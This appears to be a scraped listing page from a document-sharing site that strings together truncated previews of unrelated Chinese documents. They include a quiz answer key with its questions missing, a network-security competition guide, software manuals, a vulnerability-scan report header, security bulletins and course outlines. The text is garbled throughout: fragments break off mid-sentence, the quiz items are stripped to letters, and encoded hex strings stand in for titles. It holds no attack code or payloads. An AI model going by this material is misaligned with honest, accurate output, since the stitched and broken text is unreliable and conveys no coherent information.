1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C) (D) 5. ( B ) (Stored Program) (A) H

1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C) (D) 5. ( B ) (Stored Program) (A) H ... 2... 4... 6... 8... 10... 12... 14... 16... 18... 20... 22... 24... 25... 26... 28 1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C)

More information

电信行业网上营业厅

电信行业网上营业厅 2015 年 浙 江 首 届 网 络 安 全 管 理 员 职 业 竞 赛 竞 赛 指 南 竞 赛 组 委 会 2015 年 6 月 30 日 1 / 12 目 录 1 竞 赛 类 型... 3 1.1. 个 人 赛... 3 1.2. 团 队 赛... 3 2 题 型 及 数 量... 4 2.1. 个 人 赛... 4 2.1.1 个 人 初 赛... 4 2.1.2 个 人 决 赛... 4 2.2.

More information

目录

目录 目 录 1 系 统 概 述... 1 1.1 主 要 功 能... 1 1.2 工 作 环 境 要 求... 2 1.2.1 硬 件 环 境... 2 1.2.2 操 作 系 统... 2 1.2.3 数 据 库... 2 1.2.4 浏 览 器... 2 2 安 装 卸 载... 3 2.1 安 装 步 骤... 3 2.2 使 用 加 密 狗... 5 2.3 卸 载 步 骤... 6 3 新

More information

(CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787

(CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787 Web (CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787 1092 1/ 16 30.75 748 2005 1 1 2005 1 1 : 1 3 100

More information

内 容 协 作 平 台 TRS WCM 6.5 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 Beijing TRS Information Technology Co., Ltd 版 权 说 明 本 手 册 由 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 ( 以 下 简 称 TRS 公 司 ) 出 版, 版 权 属 TRS 公 司 所 有 未 经 出 版 者 正 式

More information

Asprain论坛的特色

Asprain论坛的特色 第 一 章 Asprain 论 坛 的 特 色 asprain 论 坛 是 一 个 适 合 于 各 中 小 学 中 专 技 校 职 高 建 设 校 园 论 坛 师 生 交 流 论 坛, 一 些 教 科 研 部 门 公 司 企 业 建 设 内 部 论 坛 IT 技 术 爱 好 者 建 设 技 术 交 流 论 坛 的 免 费 论 坛 程 序 它 有 两 个 版 本, 分 别 是 asp+access 版

More information

<4D6963726F736F667420576F7264202D2077656273616C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1>

<4D6963726F736F667420576F7264202D2077656273616C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1> WebSales 網 站 推 銷 員 客 戶 使 用 手 冊 最 好 的 輔 助 工 具, 尚 須 勤 於 操 作 與 檢 討, 適 時 修 正 方 向, 才 能 使 您 的 網 站 獲 得 最 大 效 益 目 錄 註 冊 與 新 手 快 速 指 引 1 功 能 介 紹 增 加 業 務 客 服 人 員 2 歡 迎 詞 設 定 4 自 訂 樣 式 與 位 置, 自 動 產 生 HTML 網 頁 原 始

More information

09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content

09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content 當智慧財產 侵犯人權? 智慧財產與人權 Kickstarter The Matrix The Matrix Avatar Eywa 12 2013 4 484 09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content

More information

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop..

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop.. Neelesh Kamkolkar, 产 品 经 理 Ellie Fields, 产 品 营 销 副 总 裁 Marc Rueter, 战 略 解 决 方 案 高 级 总 监 适 用 于 企 业 的 Tableau: IT 概 述 目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡

More information

温州市政府分散采购

温州市政府分散采购 温 州 市 政 府 分 散 采 购 招 标 文 件 招 标 编 号 :F - G B 2 0 1 6 0 3 1 4 0 0 4 7 招 标 项 目 : 温 州 市 人 民 政 府 办 公 室 政 务 云 平 台 ( 重 ) 招 标 方 式 : 公 开 招 标 招 标 人 : 温 州 市 人 民 政 府 办 公 室 招 标 代 理 : 二 〇 一 六 年 三 月 目 录 投 标 保 证 金 办 理

More information

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操 计 算 机 基 础 部 程 序 设 计 类 课 程 介 绍 1. Java 语 言 程 序 设 计 Java 简 介 Java 是 一 种 开 放 的 可 以 撰 写 跨 平 台 应 用 程 序 的 面 向 对 象 的 程 序 设 计 语 言 Java 技 术 具 有 卓 越 的 通 用 性 高 效 性 平 台 移 植 性 和 安 全 性, 广 泛 应 用 于 PC 数 据 中 心 科 学 超 级

More information

2

2 E V E P P 9 4 8 2 9 1 2 PDCA WEB 3 ( ) ( ) Microsoft Windows WEB MS Windows 2000 MS Access 97 IIS 5.0 Windows 4 VPP ISO 14001 ( ) ( 2.2 ) 5 PDCA Road map ( ISO 14001 ( ) ( ISO 14001 ) 6 0. 4.4 1. 4.5 2.2

More information

1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名 1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信 息 类 4 7% 29% 高 风 险 36% 中 风 险 低 风

1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名  1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信 息 类 4 7% 29% 高 风 险 36% 中 风 险 低 风 网 站 安 全 扫 描 报 告 http://wjw.changning.sh.cn 漏 洞 扫 描 报 告 上 海 三 零 卫 士 信 息 安 全 有 限 公 司 1 1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名 http://wjw.changning.sh.cn 1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信

More information

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63>

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63> 第 4 单 元 搭 建 自 己 的 Web 站 点 本 单 元 通 过 学 习 架 构 Web 服 务 器, 实 现 Web 服 务, 管 理 Web 站 点, 了 解 Web 站 点 服 务 器 的 架 构 个 人 空 间 和 虚 拟 主 机 的 概 念, 掌 握 IIS 组 件 的 安 装 Web 站 点 的 创 建 管 理 站 点 属 性 选 项 卡 的 配 置 管 理 等 知 识,Web 网

More information

46 2011 11 467 數位遊戲式學習系統 7 2011 11 467 47 3 DBGameSys 48 2011 11 467 正規化資料模組 如何配置並儲存電子化資料 以 便減少資料被重覆儲存的程序 DBGameSys的主要功能模組包 學習者 審核評分模組 含 正規化資料模組 審核評分 模組 高分列表模組3大區塊 系統資料庫 在正規化資料模組的執行 高分列表模組 過程中 先要求學習者瀏覽遊戲

More information

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7 计 算 机 系 软 件 工 程 专 业 习 指 南 广 东 科 技 院 计 算 机 系 2015-9-1 软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

More information

02 2 成立 Facebook 粉絲專頁 Facebook Facebook Facebook 1, Facebook Facebook 1 Facebook 2-21

02 2 成立 Facebook 粉絲專頁 Facebook Facebook Facebook 1, Facebook Facebook 1 Facebook 2-21 賺更多 24 24 2-10 我就是沒錢! 所以我只能利用免費的資源來獲取網路流量, 怎麼做比較好? 1 透過 Facebook 貼文在自己的個人頁面, 讓好友看見 Facebook Facebook 2-20 02 2 成立 Facebook 粉絲專頁 Facebook Facebook Facebook 1,000 100 Facebook Facebook 1 Facebook 2-21 賺更多

More information

輕鬆學 Dreamweaver CS5 網頁設計..\Example\Ch0\ \.html..\example\ch0\ \mouse.txt..\example\ch0\ \ _Ok.html 學習重點 JavaScript 複製程式碼 mouse.txt Ctrl+C Ctrl+C 0-4

輕鬆學 Dreamweaver CS5 網頁設計..\Example\Ch0\ \.html..\example\ch0\ \mouse.txt..\example\ch0\ \ _Ok.html 學習重點 JavaScript 複製程式碼 mouse.txt Ctrl+C Ctrl+C 0-4 JAVA Extension 0..\Example\Ch0\ \ T.html..\Example\Ch0\ \ T.txt T.txt..\Example\Ch0\ \ T_Ok.html 提示 :. Marquee Marquee Font Color #FFFFFF BG Color #867bf Width 90 Height 50. T.txt Ctrl+C your scrolling

More information

SiteView技术白皮书

SiteView技术白皮书 SiteView ECC V6.2 技 术 白 皮 书 游 龙 网 络 科 技 ( 中 国 ) 有 限 公 司 DragonFlow Networks(China),Inc. 目 录 第 一 章 产 品 概 述... 3 第 二 章 系 统 结 构... 6 一 系 统 架 构... 7 1 用 户 管 理 模 块... 7 2 Web Server... 8 3 存 储 加 密 模 块... 8

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 侠 诺 神 捕 QnoSniff 专 业 版 2.0 简 体 中 文 使 用 手 册 目 录 一 简 介... 4 二 QnoSniff 专 业 版 系 统 安 装 与 配 置... 5 2.1 开 始 之 前 的 准 备... 5 2.2 QnoSniff 专 业 版 安 装 过 程 中 所 需 组 件... 5 2.3 布 署 连 接 范 例 拓 朴... 6 2.4 开 始 安 装... 6

More information

( )... 5 ( ) ( )

( )... 5 ( ) ( ) 2016 大學校院招收大陸地區學生聯合招生委員會 71005 臺南市永康區南臺街 1 號 E-mail:rusen@stust.edu.tw WEB:http://rusen.stust.edu.tw TEL:+886-6-2435163 FAX:+886-6-2435165 2 0 1 6 0 1 1 9 2016... 2... 3... 5 ( )... 5 ( )... 5 1... 6 2...

More information

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63>

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63> 上 海 市 高 等 学 校 计 算 机 等 级 考 试 ( 三 级 ) 考 试 大 纲 -- 建 议 稿 -- 2007-6-25 25 目 录 上 海 市 高 等 学 校 计 算 机 等 级 考 试 三 级 总 体 说 明 -----------------1 三 级 ( 计 算 机 系 统 与 网 络 技 术 ) 考 试 大 纲 ---------------------2 三 级 ( 管 理

More information

RUN_PC連載_8_.doc

RUN_PC連載_8_.doc PowerBuilder 8 (8) Web DataWindow ( ) DataWindow Web DataWindow Web DataWindow Web DataWindow PowerDynamo Web DataWindow / Web DataWindow Web DataWindow Wizard Web DataWindow Web DataWindow DataWindow

More information

1 情 况 综 述 2016 年 3 月, 全 省 公 共 互 联 网 网 络 安 全 状 况 整 体 评 价 为 良 本 月, 我 省 互 联 网 基 础 设 施 运 行 平 稳, 全 省 范 围 内 未 发 生 造 成 重 大 影 响 的 基 础 设 施 运 行 安 全 事 件, 未 发 生 网

1 情 况 综 述 2016 年 3 月, 全 省 公 共 互 联 网 网 络 安 全 状 况 整 体 评 价 为 良 本 月, 我 省 互 联 网 基 础 设 施 运 行 平 稳, 全 省 范 围 内 未 发 生 造 成 重 大 影 响 的 基 础 设 施 运 行 安 全 事 件, 未 发 生 网 2016 年 3 月 陕 西 省 通 信 管 理 局 国 家 计 算 机 网 络 应 急 技 术 处 理 协 调 中 心 陕 西 分 中 心 目 录 1 情 况 综 述... 2 2 安 全 事 件 分 析... 2 2.1 木 马 僵 尸 网 络 事 件 分 析... 2 2.2 飞 客 蠕 虫 病 毒 事 件 分 析... 3 2.3 网 页 篡 改 事 件 分 析... 4 2.4 网 站 后

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 俠 諾 神 捕 QnoSniff 專 業 版 2.0 繁 體 中 文 使 用 手 冊 目 錄 一 簡 介... 4 二 QnoSniff 專 業 版 系 統 安 裝 與 配 置... 6 2.1 開 始 之 前 的 準 備... 6 2.2 QnoSniff 專 業 版 安 裝 過 程 中 所 需 元 件... 6 2.3 佈 署 連 接 範 例 拓 樸... 7 2.4 開 始 安 裝... 7

More information

Azure_s

Azure_s Azure ? Azure Azure Windows Server Database Server Azure Azure Azure Azure Azure Azure Azure Azure OpenSource Azure IaaS Azure VM Windows Server Linux PaaS Azure ASP.NET PHP Node.js Python MS SQL MySQL

More information

2

2 2011 Ver. 1.2.0 2 3 P2P Tunnel BotNet Zero-Day 4 port port HTTP (TCP/80), HTTPS(TCP/443) SSL SSH IPSec Ex:TOR Protocol Obfuscation( ) P2P Protocol Obfuscation P2P 5 P2P 6 P2P P2P P2P 6 7 P2P Tunnel BotNet

More information

網站安全

網站安全 2 3 4 5 6 7 8 9 : 10 ( ) E-mail rdec@rdec.gov.tw 11 (PATCH) 12 ( ) 13 cookie 14 1. 2. 3. 4. 15 cookie Cookie Netscape IE Internet cookie cookie cookie cookie 16 MS Internet Explorer 6.x-> -> 17 cookie

More information

Microsoft Word - 改版式网页全文.doc

Microsoft Word - 改版式网页全文.doc 第 4 章 Dreamweaver CS3 高 级 篇 4.1 表 单 概 述 表 单 是 用 来 收 集 浏 览 者 的 用 户 名 密 码 E-mail 地 址 个 人 爱 好 和 联 系 地 址 等 用 户 信 息 的 输 入 区 域 集 合 浏 览 者 填 写 表 单 的 方 式 一 般 是 输 入 文 本 选 择 单 选 按 钮 或 复 选 框 以 及 从 下 拉 列 表 框 中 选 择

More information

安全公告

安全公告 信 息 安 全 漏 洞 威 胁 通 报 第 1 页 共 100 页 信 息 安 全 漏 洞 威 胁 通 报 安 恒 信 息 信 息 安 全 漏 洞 威 胁 通 报 2015 年 06 月 04 日 -2015 年 06 月 11 日 6 月 第 2 周 根 据 中 国 国 家 信 息 安 全 漏 洞 库 统 计, 本 周 共 收 集 整 理 信 息 安 全 漏 洞 112 个, 其 中 高 危 漏

More information

OWASP 中 国 高 校 人 才 计 划 宣 讲 会 时 间 :20144 年 4 月 14 日 ( 周 一 )14:30 地 点 : 湖 北 大 学 计 算 机 与 信 息 工 程 学 院 ( 科 技 楼 )13055 室 招 聘 岗 位 : 渗 透 测 试 人 员 安 全 工 程 师 大 数

OWASP 中 国 高 校 人 才 计 划 宣 讲 会 时 间 :20144 年 4 月 14 日 ( 周 一 )14:30 地 点 : 湖 北 大 学 计 算 机 与 信 息 工 程 学 院 ( 科 技 楼 )13055 室 招 聘 岗 位 : 渗 透 测 试 人 员 安 全 工 程 师 大 数 互 联 网 安 全 研 究 中 心 中 国 电 话 : +86-755-88877606 传 真 : +86-755-28188177 电 子 邮 件 : info@seczone.org 网 址 : www.seczone.org OWASP 中 国 高 校 人 才 计 划 人 才 招 聘 方 案 2014 年 4 月 OWASP 中 国 高 校 人 才 计 划 宣 讲 会 时 间 :20144

More information

最 佳 做 法 : 在 需 要 时 或 需 要 前 从 CDN 下 载 内 容, 并 使 它 们 与 Flash 代 码 和 文 件 分 离 存 盘 率 vs 响 应 速 度 当 用 户 玩 游 戏 时, 客 户 端 可 以 把 每 一 个 变 化 实 时 写 到 后 端 Web 服 务 器, 也

最 佳 做 法 : 在 需 要 时 或 需 要 前 从 CDN 下 载 内 容, 并 使 它 们 与 Flash 代 码 和 文 件 分 离 存 盘 率 vs 响 应 速 度 当 用 户 玩 游 戏 时, 客 户 端 可 以 把 每 一 个 变 化 实 时 写 到 后 端 Web 服 务 器, 也 SNS 游 戏 的 可 扩 展 体 系 结 构 和 最 佳 应 用 介 绍 社 交 网 络 游 戏 是 当 今 最 热 门 的 在 线 游 戏 投 资 领 域, 具 有 炙 手 可 热 的 增 长 许 多 Facebook 上 的 社 交 网 络 游 戏 每 天 吸 引 着 数 以 百 万 或 千 万 的 用 户, 并 且 收 入 有 几 十 或 数 百 亿 美 元 所 以 现 在 每 个 人 都

More information

目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目 需 求 和 技 术 方 案 要 求 1

目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目 需 求 和 技 术 方 案 要 求 1 政 府 采 购 招 标 文 件 ( 服 务 类 ) 第 二 册 项 目 编 号 :SDGP2016-224 项 目 名 称 : 公 共 法 律 服 务 系 统 开 发 项 目 包 号 :A1 山 东 省 省 级 机 关 政 府 采 购 中 心 目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目

More information

目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放 性... 8 3.5 高 性 能 和

目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放 性... 8 3.5 高 性 能 和 致 远 协 同 管 理 软 件 V5 平 台 白 皮 书 北 京 致 远 协 创 软 件 有 限 公 司 2014 年 6 月 1 / 20 目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放

More information

Microsoft Word - 2011-030-1-1SRS - 軟體需求規格.doc

Microsoft Word - 2011-030-1-1SRS - 軟體需求規格.doc 快 樂 牧 場 主 人 軟 體 需 求 規 格 SRS-IM-2011-030-1-1 朝 陽 科 技 大 學 資 訊 管 理 系 指 導 老 師 : 范 揚 文 副 教 授 學 生 : 王 昱 尚 何 駿 青 陳 伯 誠 董 次 麟 許 閔 翔 中 華 民 國 一 百 年 十 二 月 五 日 目 錄 1. 簡 介... 4 1.1 目 的... 4 1.2 範 圍... 4 1.3 參 考 文 件...

More information

IIS Web FTP

IIS Web FTP 1... 1 1... 1 2... 1 3... 2 6 C/S... 2 4... 4 7... 5 8... 5 9... 6 10 Web... 7 11 CORBA... 8 12... 8 2... 9 1... 9 2... 9 3... 10 4 BSP Business System Planning... 11 5... 13 6... 15 7... 15 8... 16 9...

More information

臺銀人壽「98年九至十一職等人員甄試」

臺銀人壽「98年九至十一職等人員甄試」 桃 園 大 眾 捷 運 公 司 104 年 度 新 進 人 員 甄 試 簡 章 執 行 單 位 : 銘 傳 大 學 地 址 : 台 北 市 士 林 區 中 山 北 路 五 段 250 號 電 話 :(02)28809748 服 務 時 間 : 週 一 至 週 五 8:10~17:00 E-mail:pr@mail.mcu.edu.tw 中 華 民 國 104 年 5 年 1 日 公 告 關 於 桃

More information

ebook4-12

ebook4-12 12 CGI C G I (Common Gateway Interface) We b P H P C G I H T M L H T T P H T M L We b H T T P We We b I n t e r n e t R F C h t t p : / / w w w. i e t f. o rg / P H P C G I C G A p a c h e C G I P H P

More information

目 录 一. 基 本 原 则... 4 二. 漏 洞 反 馈 和 处 理 流 程... 4 预 报 告 阶 段... 4 报 告 阶 段... 4 处 理 阶 段... 4 修 复 阶 段... 4 完 成 阶 段... 5 三. 安 全 漏 洞 评 分 标 准... 5 严 重... 5 高 危.

目 录 一. 基 本 原 则... 4 二. 漏 洞 反 馈 和 处 理 流 程... 4 预 报 告 阶 段... 4 报 告 阶 段... 4 处 理 阶 段... 4 修 复 阶 段... 4 完 成 阶 段... 5 三. 安 全 漏 洞 评 分 标 准... 5 严 重... 5 高 危. 联 想 安 全 响 应 中 心 漏 洞 处 理 流 程 V2.0 版 本 内 容 日 期 V 2.0 更 新 奖 励 评 分 标 准 ; 更 新 FAQ 2016-4-1 V 1.0 发 布 第 一 版 2015-4-1 目 录 一. 基 本 原 则... 4 二. 漏 洞 反 馈 和 处 理 流 程... 4 预 报 告 阶 段... 4 报 告 阶 段... 4 处 理 阶 段... 4 修 复

More information

信息安全保障参考文件

信息安全保障参考文件 注 册 信 息 安 全 专 业 人 员 (CISP) 知 识 体 系 大 纲 版 本 :2.0 中 国 信 息 安 全 测 评 中 心 版 权 2010 中 国 信 息 安 全 测 评 中 心 中 国 信 息 安 全 测 评 中 心 目 录 目 录...1 前 言...4 第 1 章 注 册 信 息 安 全 专 业 人 员 (CISP) 知 识 体 系 概 述...5 1.1 CISP 资 质 认

More information

目 錄 摘 要...Ⅰ 第 一 章 簡 介...1 1.1 簡 介...1 1.2 研 究 動 機...2 1.3 研 究 目 的...3 1.4 文 獻 探 討...4 第 二 章 電 腦 犯 罪 之 定 義...6 2.1 網 路 犯 罪 分 析...7 2.2 電 腦 網 路 犯 罪 的 特

目 錄 摘 要...Ⅰ 第 一 章 簡 介...1 1.1 簡 介...1 1.2 研 究 動 機...2 1.3 研 究 目 的...3 1.4 文 獻 探 討...4 第 二 章 電 腦 犯 罪 之 定 義...6 2.1 網 路 犯 罪 分 析...7 2.2 電 腦 網 路 犯 罪 的 特 修 平 科 技 大 學 資 訊 網 路 技 術 系 電 腦 網 路 犯 罪 及 詐 騙 指 導 老 師 : 沈 良 澤 老 師 組 長 :YN99053 王 靖 傑 組 員 :YN99038 洪 煜 軒 YN99013 陳 致 遠 YN99050 鄭 惟 中 指 導 老 師 : 中 華 民 國 103 年 1 月 4 號 目 錄 摘 要...Ⅰ 第 一 章 簡 介...1 1.1 簡 介...1 1.2

More information

untitled

untitled II III IV V VI VII VIII IX 2 ASP 1 ASP 3 4 ASP Web CGI ISAPI OLEISAPI Perl IDC ASP dbweb Perl IDC ASP dbweb IDC 1 ASP 5 Web Web DLL 6 ASP 1 ASP 7 8 ASP 1 ASP 9 10 ASP 1 ASP 11 12 ASP 1 ASP 13 14 ASP 1

More information

Microsoft Word - 01.DOC

Microsoft Word - 01.DOC 第 1 章 JavaScript 简 介 JavaScript 是 NetScape 公 司 为 Navigator 浏 览 器 开 发 的, 是 写 在 HTML 文 件 中 的 一 种 脚 本 语 言, 能 实 现 网 页 内 容 的 交 互 显 示 当 用 户 在 客 户 端 显 示 该 网 页 时, 浏 览 器 就 会 执 行 JavaScript 程 序, 用 户 通 过 交 互 式 的

More information

財金資訊-84期.indd

財金資訊-84期.indd BANK 3.0 BANK 3.0 / 102 12 Target Corporation POS (Point-of-sale) 7,000 200 10 ( ) 103 5 29 11 2 103 7 10 10300173840 ( ) ( ) 1 48 / No.84 / 2015.10 BANK 3.0 1 ( ATM ) ( ) ( ) 103 ( 2) 2 ( ) ( ) ( ) (

More information

<4D6963726F736F667420576F7264202D20C8EDBCFEA1B232303130A1B33136BAC5A3BAB9D8D3DAB7A2B2BC32303130C4EAC8EDBCFEB9A4B3CCCAB5D1B5D6AED0A3C4DABFC6D1D0CFEEC4BFB5C4CDA8D6AA2E646F63>

<4D6963726F736F667420576F7264202D20C8EDBCFEA1B232303130A1B33136BAC5A3BAB9D8D3DAB7A2B2BC32303130C4EAC8EDBCFEB9A4B3CCCAB5D1B5D6AED0A3C4DABFC6D1D0CFEEC4BFB5C4CDA8D6AA2E646F63> 附 件 4 软 件 学 院 第 六 届 软 件 创 新 设 计 大 赛 专 题 项 目 项 目 1 指 导 老 师 : 林 倞 潘 炎 曾 坤 项 目 ( 课 题 ) 名 称 : 基 于 GraphCut 算 法 的 快 速 图 像 分 割 技 术 图 像 分 割 是 图 像 处 理 的 基 本 技 术 之 一, 也 是 图 像 分 析 的 最 基 本 的 步 骤, 作 为 计 算 机 视 觉 的

More information

上海师范大学本科课程教学大纲格式

上海师范大学本科课程教学大纲格式 Web 程 序 设 计 教 学 大 纲 课 程 名 称 : Web 程 序 设 计 英 文 名 称 : Web Programming 学 分 : 总 学 时 : 38 实 验 ( 上 机 ) 学 时 : 0 开 课 专 业 : 电 子 商 务 专 业 一 课 程 性 质 目 的 和 培 养 目 标 : 通 过 对 基 于 Web 数 据 库 的 交 互 式 网 络 信 息 系 统 的 基 础 知

More information

真人网络棋牌游戏.原载于《人民邮电报》2016年4月15日《乐游记》

真人网络棋牌游戏.原载于《人民邮电报》2016年4月15日《乐游记》 真 人 网 络 棋 牌 游 戏. 原 载 于 人 民 邮 电 报 2016 年 4 月 15 日 乐 游 真 钱 棋 牌 http://www.bkzqqp.com 真 人 网 络 棋 牌 游 戏. 原 载 于 人 民 邮 电 报 2016 年 4 月 15 日 乐 游 记 依 然 无 惧 危 险 我 行 我 素 文 / 张 书 乐 http://www.bkzqqp.com/a/zrqpyxpt/2016/08

More information

HTML5安全问题

HTML5安全问题 HTML5 问题 刘 1 户帐 录帐 户 银帐 员帐 击 (Cross Site Scripting) 恶 击 Web 页 面 里插 入恶意 html 2 业 读 篡 删 业 码 户浏览该页 时 Web html 码 执 达 恶 3 业 业 值 资 击 户 4 转账 5 发 电 邮 ( iframe frame XMLHttpRequest Flash 击 户 执 动 执 发 发 ) 6 马 XSS

More information

AVG AntiVirus User Manual

AVG AntiVirus User Manual AVG AntiVirus 用户手册 文档修订 AVG.04 2016 2 9 版权所有 AVG Technologies CZ, s.r.o. 保留所有权利 所有其它商标均是其各自所有者的财产 目录 1. 简介 3 2. AVG 安装要求 4 2.1 支持的操作系统 4 2.2 最低 推荐硬件要求 4 5 3. AVG 安装过程 3.1 欢迎 5 3.2 输入您的许可证号码 6 3.3 自定义安装

More information

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工 Shenzhen WitSoft Information Technology Co., Ltd. 主 办 券 商 二 〇 一 六 年 二 月 声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本

More information

Microsoft PowerPoint - SAGE 2010

Microsoft PowerPoint - SAGE 2010 SAGE Journals Online -Communication Studies 大綱 SAGE 簡介 Communication Studies 收錄內容 SJO 平台功能介紹 首頁 瀏覽功能 檢索功能 進階服務 SAGE Content 超過 520 種人文 社會科學 理工 科技領域電子期刊 SAGE 與超過 245 個國際知名的學會合作 ( 包括 American Sociological

More information

RUN_PC連載_10_.doc

RUN_PC連載_10_.doc PowerBuilder 8 (10) Jaguar CTS ASP Jaguar CTS PowerDynamo Jaguar CTS Microsoft ASP (Active Server Pages) ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar Server ASP

More information

大连软~1

